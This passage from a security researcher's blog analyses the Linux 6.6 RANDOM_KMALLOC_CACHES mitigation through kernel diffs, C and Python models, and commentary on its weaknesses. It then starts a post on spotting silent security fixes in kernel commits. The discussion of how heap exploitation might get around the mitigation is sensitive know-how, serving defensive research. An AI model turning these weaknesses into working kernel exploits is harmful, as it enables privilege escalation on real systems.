</span></span><span class="line"><span class="cl"> <span class="cp">#define INIT_KMALLOC_INFO(__size, __short_size)			\
</span></span></span><span class="line"><span class="cl"><span class="cp"> {								\
</span></span></span><span class="line"><span class="cl"><span class="cp"> 	.name[KMALLOC_NORMAL]  = &#34;kmalloc-&#34; #__short_size,	\
</span></span></span><span class="line"><span class="cl"><span class="cp"> 	KMALLOC_RCL_NAME(__short_size)				\
</span></span></span><span class="line"><span class="cl"><span class="cp"> 	KMALLOC_CGROUP_NAME(__short_size)			\
</span></span></span><span class="line"><span class="cl"><span class="cp"> 	KMALLOC_DMA_NAME(__short_size)				\
</span></span></span><span class="line"><span class="cl"><span class="cp">+	KMALLOC_RANDOM_NAME(RANDOM_KMALLOC_CACHES_NR, __short_size)	\
</span></span></span><span class="line"><span class="cl"><span class="cp"> 	.size = __size,						\
</span></span></span><span class="line"><span class="cl"><span class="cp"> }
</span></span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">const</span> <span class="k">struct</span> <span class="n">kmalloc_info_struct</span> <span class="n">kmalloc_info</span><span class="p">[]</span> <span class="n">__initconst</span> <span class="o">=</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">96</span><span class="p">,</span> <span class="mi">96</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">192</span><span class="p">,</span> <span class="mi">192</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="mi">8</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">16</span><span class="p">,</span> <span class="mi">16</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">32</span><span class="p">,</span> <span class="mi">32</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">64</span><span class="p">,</span> <span class="mi">64</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">128</span><span class="p">,</span> <span class="mi">128</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">256</span><span class="p">,</span> <span class="mi">256</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">512</span><span class="p">,</span> <span class="mi">512</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">1024</span><span class="p">,</span> <span class="mi">1</span><span class="n">k</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">2048</span><span class="p">,</span> <span class="mi">2</span><span class="n">k</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">4096</span><span class="p">,</span> <span class="mi">4</span><span class="n">k</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">8192</span><span class="p">,</span> <span class="mi">8</span><span class="n">k</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">16384</span><span class="p">,</span> <span class="mi">16</span><span class="n">k</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">32768</span><span class="p">,</span> <span class="mi">32</span><span class="n">k</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">65536</span><span class="p">,</span> <span class="mi">64</span><span class="n">k</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">131072</span><span class="p">,</span> <span class="mi">128</span><span class="n">k</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">262144</span><span class="p">,</span> <span class="mi">256</span><span class="n">k</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">524288</span><span class="p">,</span> <span class="mi">512</span><span class="n">k</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">1048576</span><span class="p">,</span> <span class="mi">1</span><span class="n">M</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">2097152</span><span class="p">,</span> <span class="mi">2</span><span class="n">M</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">};</span>
</span></span></code></pre></div><p>diff from <a href="https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L787">mm/slab_common.c</a></p>
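<p>The recursive macro chain is easier to follow at a smaller scale. Below is a cut-down userspace version with 3 copies instead of 15; the <code>_model</code> names, <code>NR_COPIES</code>, <code>INIT_INFO()</code> and <code>find_name()</code> are hypothetical stand-ins, but the token pasting and stringification work the same way:</p>

```c
#include <string.h>

#define NR_COPIES    3 /* the kernel uses 15 */
#define RANDOM_START 0 /* same slot as the normal cache */

#define CONCAT(a, b) a ## b
/* N is expanded to 3 before pasting, so this becomes RAND_3(sz). */
#define RANDOM_NAME(N, sz) CONCAT(RAND_, N)(sz)
/* Each level emits the levels below it, then its own designated initialiser. */
#define RAND_1(sz)            .name[RANDOM_START + 1] = "kmalloc-rnd-01-" #sz,
#define RAND_2(sz) RAND_1(sz) .name[RANDOM_START + 2] = "kmalloc-rnd-02-" #sz,
#define RAND_3(sz) RAND_2(sz) .name[RANDOM_START + 3] = "kmalloc-rnd-03-" #sz,

struct kmalloc_info_model {
	const char *name[NR_COPIES + 1];
	unsigned int size;
};

#define INIT_INFO(bytes, label)                  \
{                                                \
	.name[RANDOM_START] = "kmalloc-" #label, \
	RANDOM_NAME(NR_COPIES, label)            \
	.size = bytes,                           \
}

/* One element, as it would appear in a kmalloc_info[]-style table. */
const struct kmalloc_info_model info_1k = INIT_INFO(1024, 1k);

/* Return the index of `name` in info->name[], or -1 if it is not there. */
int find_name(const struct kmalloc_info_model *info, const char *name)
{
	for (int i = 0; i <= NR_COPIES; i++) {
		if (strcmp(info->name[i], name) == 0)
			return i;
	}
	return -1;
}
```

<p>Here a single <code>INIT_INFO(1024, 1k)</code> fills in <code>kmalloc-1k</code> plus <code>kmalloc-rnd-01-1k</code> through <code>kmalloc-rnd-03-1k</code>, so bumping the copy count only needs one more <code>RAND_N</code> line.</p>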
<h3 id="seed-setup">Seed Setup</h3>
<p>Moving on, we can see how the per-boot seed is generated, which is one of the values used to randomise which cache a particular <code>kmalloc()</code> call site is going to end up in.</p>
<p>This is initialised during the initial kmalloc cache creation and is stored in the exported symbol <a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L398"><code>random_kmalloc_seed</code></a>, as we can see below:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">ifdef</span> <span class="n">CONFIG_RANDOM_KMALLOC_CACHES</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">random_kmalloc_seed</span> <span class="n">__ro_after_init</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="nf">EXPORT_SYMBOL</span><span class="p">(</span><span class="n">random_kmalloc_seed</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">endif</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="p">...</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="n">__init</span> <span class="nf">create_kmalloc_caches</span><span class="p">(</span><span class="kt">slab_flags_t</span> <span class="n">flags</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="p">...</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">ifdef</span> <span class="n">CONFIG_RANDOM_KMALLOC_CACHES</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span>	<span class="n">random_kmalloc_seed</span> <span class="o">=</span> <span class="nf">get_random_u64</span><span class="p">();</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">endif</span>
</span></span></code></pre></div><p>diff from <a href="https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L956">mm/slab_common.c</a></p>
<p>It&rsquo;s worth noting here the <a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/init.h#L52"><code>__init</code></a> and <code>__ro_after_init</code> annotations. The former is a macro used to tell the kernel this code is only run during initialisation and doesn&rsquo;t need to hang around in memory after everything&rsquo;s set up.</p>
<p><code>__ro_after_init</code> was introduced by Kees Cook back in 2016<a href="https://lwn.net/Articles/676145/">[1]</a> to reduce the writable attack surface in the kernel by moving memory that&rsquo;s only written to during kernel initialisation to a read-only memory region.</p>
<h3 id="kmalloc-allocations">Kmalloc Allocations</h3>
<p>Okay, so we&rsquo;ve covered how the caches are created and the seed initialisation, how are objects then actually allocated to one of these random kmalloc caches?</p>
<p>As we touched on, the random cache a particular allocation ends up in comes from two factors: the <code>kmalloc()</code> callsite and the per-boot <code>random_kmalloc_seed</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="o">+</span><span class="k">static</span> <span class="n">__always_inline</span> <span class="k">enum</span> <span class="n">kmalloc_cache_type</span> <span class="n">kmalloc_type</span><span class="p">(</span><span class="n">gfp_t</span> <span class="n">flags</span><span class="p">,</span> <span class="n">unsigned</span> <span class="n">long</span> <span class="n">caller</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"> <span class="p">{</span>
</span></span><span class="line"><span class="cl"> 	<span class="o">/*</span>
</span></span><span class="line"><span class="cl"> 	 <span class="o">*</span> <span class="n">The</span> <span class="n">most</span> <span class="n">common</span> <span class="k">case</span> <span class="n">is</span> <span class="n">KMALLOC_NORMAL</span><span class="p">,</span> <span class="n">so</span> <span class="n">test</span> <span class="k">for</span> <span class="n">it</span>
</span></span><span class="line"><span class="cl"> 	 <span class="o">*</span> <span class="n">with</span> <span class="n">a</span> <span class="n">single</span> <span class="n">branch</span> <span class="k">for</span> <span class="n">all</span> <span class="n">the</span> <span class="n">relevant</span> <span class="n">flags</span><span class="o">.</span>
</span></span><span class="line"><span class="cl"> 	 <span class="o">*/</span>
</span></span><span class="line"><span class="cl"> 	<span class="k">if</span> <span class="p">(</span><span class="n">likely</span><span class="p">((</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">KMALLOC_NOT_NORMAL_BITS</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="c1">#ifdef CONFIG_RANDOM_KMALLOC_CACHES</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span>		<span class="o">/*</span> <span class="n">RANDOM_KMALLOC_CACHES_NR</span> <span class="p">(</span><span class="o">=</span><span class="mi">15</span><span class="p">)</span> <span class="n">copies</span> <span class="o">+</span> <span class="n">the</span> <span class="n">KMALLOC_NORMAL</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span>		<span class="k">return</span> <span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span> <span class="n">hash_64</span><span class="p">(</span><span class="n">caller</span> <span class="o">^</span> <span class="n">random_kmalloc_seed</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span>						      <span class="n">ilog2</span><span class="p">(</span><span class="n">RANDOM_KMALLOC_CACHES_NR</span> <span class="o">+</span> <span class="mi">1</span><span class="p">));</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="c1">#else</span>
</span></span><span class="line"><span class="cl"> 		<span class="k">return</span> <span class="n">KMALLOC_NORMAL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="c1">#endif</span>
</span></span></code></pre></div><p>diff from <a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L400">include/linux/slab.h</a></p>
<p>As we can see above, when calculating the kmalloc cache type for an allocation, if the flags are appropriate for the random kmalloc caches, a hash is generated from the two values mentioned. That hash selects the kmalloc cache type (from the <a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L363"><code>kmalloc_cache_type</code></a> enum, which has one entry for each of the <code>RANDOM_KMALLOC_CACHES_NR</code> copies), which is then used to fetch the cache from <code>kmalloc_caches[]</code>.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="k">static</span> <span class="n">__always_inline</span> <span class="nf">__alloc_size</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="kt">void</span> <span class="o">*</span><span class="nf">kmalloc</span><span class="p">(</span><span class="kt">size_t</span> <span class="n">size</span><span class="p">,</span> <span class="kt">gfp_t</span> <span class="n">flags</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="nf">__builtin_constant_p</span><span class="p">(</span><span class="n">size</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="n">size</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">index</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="n">size</span> <span class="o">&gt;</span> <span class="n">KMALLOC_MAX_CACHE_SIZE</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">			<span class="k">return</span> <span class="nf">kmalloc_large</span><span class="p">(</span><span class="n">size</span><span class="p">,</span> <span class="n">flags</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"> 		<span class="n">index</span> <span class="o">=</span> <span class="nf">kmalloc_index</span><span class="p">(</span><span class="n">size</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"> 		<span class="k">return</span> <span class="nf">kmalloc_trace</span><span class="p">(</span>
</span></span><span class="line"><span class="cl"><span class="o">-</span>				<span class="n">kmalloc_caches</span><span class="p">[</span><span class="nf">kmalloc_type</span><span class="p">(</span><span class="n">flags</span><span class="p">)][</span><span class="n">index</span><span class="p">],</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span>				<span class="n">kmalloc_caches</span><span class="p">[</span><span class="nf">kmalloc_type</span><span class="p">(</span><span class="n">flags</span><span class="p">,</span> <span class="n">_RET_IP_</span><span class="p">)][</span><span class="n">index</span><span class="p">],</span>
</span></span><span class="line"><span class="cl"> 				<span class="n">flags</span><span class="p">,</span> <span class="n">size</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"> 	<span class="p">}</span>
</span></span><span class="line"><span class="cl"> 	<span class="k">return</span> <span class="nf">__kmalloc</span><span class="p">(</span><span class="n">size</span><span class="p">,</span> <span class="n">flags</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>diff from <a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L590">include/linux/slab.h</a></p>
<p>We can see <code>kmalloc()</code> now passes the caller, using the <a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/instruction_pointer.h#L7"><code>_RET_IP_</code></a> macro, to <code>kmalloc_type()</code>. This means the <code>unsigned long caller</code> used to generate the hash is the return address for the <code>kmalloc()</code> call.</p>
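<p>To make the selection logic a bit more concrete, here&rsquo;s a rough Python model of the <code>KMALLOC_NORMAL</code> branch of <code>kmalloc_type()</code>. It&rsquo;s a sketch rather than the kernel&rsquo;s code: it assumes the 64-bit multiplicative <code>hash_64()</code>, assumes <code>KMALLOC_RANDOM_START</code> aliases <code>KMALLOC_NORMAL</code> (0), and the callsite addresses are made up for illustration.</p>

```python
import secrets

GOLDEN_RATIO_64 = 0x61C8864680B583EB  # multiplier used by the kernel's 64-bit hash_64()
RANDOM_KMALLOC_CACHES_NR = 15         # from the comment in the diff above
KMALLOC_RANDOM_START = 0              # assumption: aliases KMALLOC_NORMAL


def hash_64(val, bits):
    """Multiplicative hash: keep the top `bits` bits of the 64-bit product."""
    return (val * GOLDEN_RATIO_64) % 2**64 // 2 ** (64 - bits)


def kmalloc_type(caller, seed):
    """Model of the KMALLOC_NORMAL branch of kmalloc_type()."""
    bits = (RANDOM_KMALLOC_CACHES_NR + 1).bit_length() - 1  # ilog2(16) == 4
    return KMALLOC_RANDOM_START + hash_64(caller ^ seed, bits)


if __name__ == "__main__":
    # Hypothetical return addresses for two unrelated kmalloc() callsites.
    callsites = {"callsite_a": 0xFFFFFFFF81234567, "callsite_b": 0xFFFFFFFF81ABCDEF}
    for boot in range(3):
        seed = secrets.randbits(64)  # stands in for get_random_u64()
        picks = {name: kmalloc_type(addr, seed) for name, addr in callsites.items()}
        print(f"boot {boot}: {picks}")
```

<p>Running it a few times shows the two properties we care about: a given callsite always lands in the same one of the 16 caches for a given seed, and a new seed reshuffles which cache that is.</p>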
<h3 id="thoughts">Thoughts</h3>
<p><img src="https://sam4k.com/content/images/2023/10/how_do_we_feel-1.gif" alt=""></p>
<p>To wrap things up on the implementation side of things, let&rsquo;s discuss some of the pros and cons for <code>RANDOM_KMALLOC_CACHES</code>. As the config help text explains, the aim of this hardening feature is to make it &ldquo;more difficult to spray vulnerable memory objects on the heap for the purpose of exploiting memory vulnerabilities.&rdquo;<a href="https://elixir.bootlin.com/linux/v6.6/source/mm/Kconfig#L339">[2]</a></p>
<p>It&rsquo;s safe to say (I think), that within the context of the current heap exploitation meta and exploring the feature&rsquo;s implementation, <strong>it does shake up the existing techniques</strong> commonly seen for shaping the heap and exploiting heap vulnerabilities.</p>
<p>On top of that, it&rsquo;s a reasonably <strong>lightweight</strong> and <strong>performance friendly</strong> implementation, pretty much exclusively touching the slab allocator implementation.</p>
<p>It is because of that last point, though, that it is <strong>unable to provide any mitigation against the cache reuse and overflow techniques</strong> mentioned earlier, as these rely on manipulating the underlying page allocator, which isn&rsquo;t addressed by this patch.</p>
<p>As a result, in certain circumstances you could cause one of these random kmalloc cache slabs containing your vulnerable object to be freed and have it reallocated in a more favourable cache. The same could be said for the cache overflow attacks.</p>
<p>An implementation-specific point to note is the use of the kmalloc return address (for <code>kmalloc()</code>, <code>kmalloc_node()</code>, <code>__kmalloc()</code> etc.) to determine which random kmalloc cache is used. If other parts of the kernel make wrappers around the slab API for their own purposes, such as <a href="https://elixir.bootlin.com/linux/v6.6/source/fs/f2fs/f2fs.h#L3379"><code>f2fs_kmalloc()</code></a>, <strong>any objects using that wrapper can share the same <code>_RET_IP_</code></strong> from the slab allocator&rsquo;s perspective and end up in the same cache.</p>
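<p>As a toy illustration of the wrapper point, the sketch below models a wrapper that isn&rsquo;t inlined into its callers, so every allocation made through it presents the same return address to the allocator. The address, seed and object names are all hypothetical, and the hash is the same multiplicative <code>hash_64()</code> assumption as before.</p>

```python
GOLDEN_RATIO_64 = 0x61C8864680B583EB  # multiplier used by the kernel's 64-bit hash_64()


def cache_index(ret_ip, seed, bits=4):
    """Top `bits` bits of (ret_ip ^ seed) * GOLDEN_RATIO_64, as hash_64() computes."""
    return ((ret_ip ^ seed) * GOLDEN_RATIO_64) % 2**64 // 2 ** (64 - bits)


# Hypothetical address: where __kmalloc() returns to inside a non-inlined wrapper.
WRAPPER_RET_IP = 0xFFFFFFFF81500040


def wrapper_alloc(object_name, seed):
    """Every user of the wrapper presents the same return address to the allocator."""
    return object_name, cache_index(WRAPPER_RET_IP, seed)


seed = 0x0123456789ABCDEF  # arbitrary stand-in for random_kmalloc_seed
via_wrapper = [wrapper_alloc(name, seed) for name in ("obj_a", "obj_b", "obj_c")]
print(via_wrapper)
```

<p>Whatever the seed, all three objects end up with the same cache index, which is exactly the kind of grouping the mitigation is trying to avoid.</p>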
<hr>
<ol>
<li><a href="https://lwn.net/Articles/676145/">https://lwn.net/Articles/676145/</a></li>
<li><a href="https://elixir.bootlin.com/linux/v6.6/source/mm/Kconfig#L339">https://elixir.bootlin.com/linux/v6.6/source/mm/Kconfig#L339</a></li>
</ol>
<h2 id="whats-the-new-meta">What&rsquo;s The New Meta?</h2>
<p><img src="https://sam4k.com/content/images/2023/10/are_we_in_trouble.gif" alt=""></p>
<p>Before we put our speculation hats on and start discussing what the new trends and techniques for heap exploitation might look like post <code>RANDOM_KMALLOC_CACHES</code>, it&rsquo;s worth highlighting that just because it&rsquo;s <em>in</em> the 6.6 kernel doesn&rsquo;t mean we&rsquo;ll see it for a while.</p>
<p>First of all, the 6.6 kernel is the latest release and it&rsquo;ll be a while until we see this get sizeable uptake in the real world. Secondly, it&rsquo;s currently an opt-in feature, disabled by default, so it really depends on the distros and vendors to enable this (and we all know that can take a while for security stuff! <em>cough</em> <code>modprobe_path</code>).</p>
<p>Additionally, there are a couple other mitigations out there that look to mitigate heap exploitation in different ways. This includes grsecurity&rsquo;s AUTOSLAB<a href="https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game">[1]</a> and the experimental mitigations being used on kCTF by Jann Horn and Matteo Rizzo (which I&rsquo;d love to get into here, perhaps another post?!)<a href="https://github.com/thejh/linux/blob/slub-virtual-v6.1-lts/MITIGATION_README">[2]</a>. These could potentially see more uptake in the long run than <code>RANDOM_KMALLOC_CACHES</code>, or vice versa.</p>
<p>But <em>if</em> we were interested in tackling heap exploitation in a <code>RANDOM_KMALLOC_CACHES</code> environment, what might it look like? As we mentioned, this implementation focuses on the slab allocator and doesn&rsquo;t really touch the page allocator. As a result, the kernel is still vulnerable to cache reuse and overflow attacks.</p>
<p>So perhaps we see a world where &ldquo;generic techniques&rdquo; shift to finding new page allocator feng shui primitives, which has had less focus, to streamline the cache reuse/overflow approaches and gain LPE or perhaps to leak the random seed.</p>
<p>It&rsquo;s hard to say this early on, and without spending more time on the problem, whether we&rsquo;d shift into a new norm of generic techniques and approaches for page allocator feng shui as a result of this kind of slab hardening, or whether due to the constraints that&rsquo;s simply infeasible and the shift will be to more bespoke chains per bug (which could be considered quite a win for hardening&rsquo;s sake).</p>
<p>That said, I&rsquo;m sure the same was said about previous hardening features so who knows!</p>
<hr>
<ol>
<li><a href="https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game">https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game</a></li>
<li><a href="https://github.com/thejh/linux/blob/slub-virtual-v6.1-lts/MITIGATION_README">https://github.com/thejh/linux/blob/slub-virtual-v6.1-lts/MITIGATION_README</a></li>
</ol>
<h2 id="wrapping-up">Wrapping Up</h2>
<p><img src="https://sam4k.com/content/images/2023/11/did_we_make_it.gif" alt=""></p>
<p>Wow, we made it to the end! A 4k word deep dive into a new kernel mitigation certainly is one way to get back into the swing of things, hopefully it made a good read though :)</p>
<p>We talked about the new kernel mitigation <code>RANDOM_KMALLOC_CACHES</code> and gave some context into the problems it&rsquo;s trying to address. Loaded with that information we explored the implementation and how that might impact current heap exploitation techniques.</p>
<p>I would have liked to have spent more time tinkering with the mitigation in anger and perhaps including some demos or experiments, but being realistic about my time and availability, I figured it&rsquo;d be good to get this out rather than <em>maybe</em> get that out.</p>
<p>That said, maybe I&rsquo;ll try write up some old heap ndays on a <code>RANDOM_KMALLOC_CACHES=y</code> system to try and demonstrate the different approaches required. That sounds quite fun!</p>
<p>Equally, I quite liked doing a breakdown and review of a new kernel feature, so perhaps I&rsquo;ll do some more of that going forward (maybe the kCTF experimental mitigations???).</p>
<p>Anyways, you&rsquo;ve endured enough of my waffling, thanks for reading! As always feel free to <a href="https://twitter.com/sam4k1">@me</a> if you have any questions, suggestions or corrections :)</p>
<p>exit(0);</p>
]]></content:encoded></item><item><title>Analysing Linux Kernel Commits</title><description>Tag along as I talk about a half finished project, looking at analysing Linux kernel commits for interesting security fixes.</description><link>https://sam4k.com/analysing-linux-kernel-commits/</link><guid isPermaLink="false">63de782692020209c38fca22</guid><category>linux</category><category>kernel</category><category>vr</category><dc:creator>sam4k</dc:creator><pubDate>Tue, 07 Feb 2023 20:01:23 +0000</pubDate><media:content url="https://sam4k.com/content/images/2023/02/detective_pik.gif" medium="image"/><content:encoded><![CDATA[<p>It&rsquo;s been a while, hasn&rsquo;t it? This post is going to be a bit of a change of pace from usual, as it&rsquo;s actually covering some research from last year I ended up dropping.</p>
<p>The plan was to do some analysis of Linux kernel commits, to determine the feasibility of automating the process of finding interesting and potentially exploitable vulnerabilities, hopefully putting a novel poc or two together.</p>
<p>However, between both IRL circumstances and simply underestimating the time involved, this has dragged on more than I&rsquo;d like for a blog post to take and I&rsquo;m eager to move onto new things. But instead of putting it on the back burner, AKA never to see the light of day again, I thought I&rsquo;d share the tool I ended up writing and discuss some background behind it as well as my own takeaways during my time working on this stuff.</p>
<p>So in this post I&rsquo;ll talk a little about the background behind the motivations for looking into this and why kernel security fixes are an interesting topic. Then I&rsquo;ll do a quick tl;dr on the tool, Lica (<strong>Li</strong>nux <strong>C</strong>ommit <strong>A</strong>nalyser), I wrote and share some takeaways.</p>
<h2 id="disclaimer">Disclaimer</h2>
<p><img src="https://sam4k.com/content/images/2023/01/hold_up.gif" alt=""></p>
<p>Before we dive into things, some of the topics and issues I cover in this post are both complex and contentious. I want to highlight that I am by no means an expert on these things, and my thoughts here are from the experiences (and biases) of a security researcher.</p>
<p>Where there are gaps in my understanding or knowledge, I&rsquo;ll try to highlight them, and if anyone has any corrections or additional info please let me know, thank you!</p>
<h2 id="content">Content</h2>
<ul>
<li><a href="#background">Background</a>
<ul>
<li><a href="#kernel-dev-tldr">kernel dev tl;dr</a></li>
<li><a href="#on-silent-security-fixes">on (silent) security fixes</a></li>
<li><a href="#the-plan">the plan</a></li>
</ul>
</li>
<li><a href="#lica">Lica</a></li>
<li><a href="#takeaways">Takeaways</a>
<ul>
<li><a href="#on-disclosures">On Disclosures</a></li>
</ul>
</li>
<li><a href="#conclusion">Conclusion</a></li>
</ul>
<h2 id="background">Background</h2>
<p><img src="https://sam4k.com/content/images/2023/02/lets_get_into_it.gif" alt=""></p>
<p>The original motivation behind this research stems from a somewhat contentious and longstanding topic of discussion amongst the Linux kernel community regarding the handling of security fixes, such as instances of &ldquo;silent security fixes&rdquo;.</p>
<p>First of all, to give some context to what we&rsquo;re talking about, let&rsquo;s do a quick tl;dr on kernel development and some of the terms mentioned so we&rsquo;re all up to speed! (feel free to skip)</p>
<h3 id="kernel-dev-tldr">kernel dev tl;dr</h3>
<p>&ldquo;The Linux kernel is a free and open-source, monolithic, modular, multitasking, Unix-like operating system kernel [&hellip;] Day-to-day development discussions take place on the <a href="https://en.wikipedia.org/wiki/Linux_kernel_mailing_list">Linux kernel mailing list</a> (LKML). Changes are tracked using the version control system <a href="https://en.wikipedia.org/wiki/Git">git</a>&rdquo; <a href="https://en.wikipedia.org/wiki/Linux_kernel">[1]</a></p>
<p>Specifically for a project using git, we can track the changes made by looking at the commits. A commit describes a set of changes made to the project by an author. If we look at projects on GitHub for example, we can see this. As of writing, the <a href="https://github.com/torvalds/linux">Linux kernel source tree</a> mirror on GitHub has 1,154,596 commits that <a href="https://github.com/torvalds/linux/commits/master">we can peruse</a>!</p>
<p>That&rsquo;s a lot of changes, right? The Linux kernel has guidelines and rules about submitting patches<a href="https://www.kernel.org/doc/html/latest/process/submitting-patches.html">[2]</a>, but typically a commit is a logically cohesive set of changes (i.e. you won&rsquo;t see a bunch of different fixes for different parts of the kernel in one commit, I hope anyway).</p>
<p>All these changes are organised into releases, which you can read about over at <a href="https://www.kernel.org/category/releases.html">kernel.org</a>[3], with new mainline kernels being released every 9-10 weeks.</p>
<p>Important to note is the concept of <strong>backporting</strong>, whereby bug fixes introduced in latest releases are applied to older kernel releases as well. There are several long-term maintenance (aka LTS) kernel releases, to designate support for older kernels.</p>
<h3 id="on-silent-security-fixes">on (silent) security fixes</h3>
<p><img src="https://sam4k.com/content/images/2023/01/shh.gif" alt=""></p>
<p>There&rsquo;s been lots of discussion surrounding security fixes and how they should be handled in relation to non-security fixes in the kernel, and this dialogue has understandably evolved over the years as our concept and understanding of security has too.</p>
<p>It&rsquo;s a complex topic and, to oversimplify the arguments, on either extreme of the axis you may have folks saying all fixes should be treated equally, while others would argue security fixes need to be dealt with in a specific way, highlighting the impact etc.</p>
<p>A recurring topic in this space is the concept of &ldquo;silent security fixes&rdquo;, where a commit fixing a potentially exploitable vulnerability <em>intentionally</em> omits information regarding the security implications/reasons behind the fix.</p>
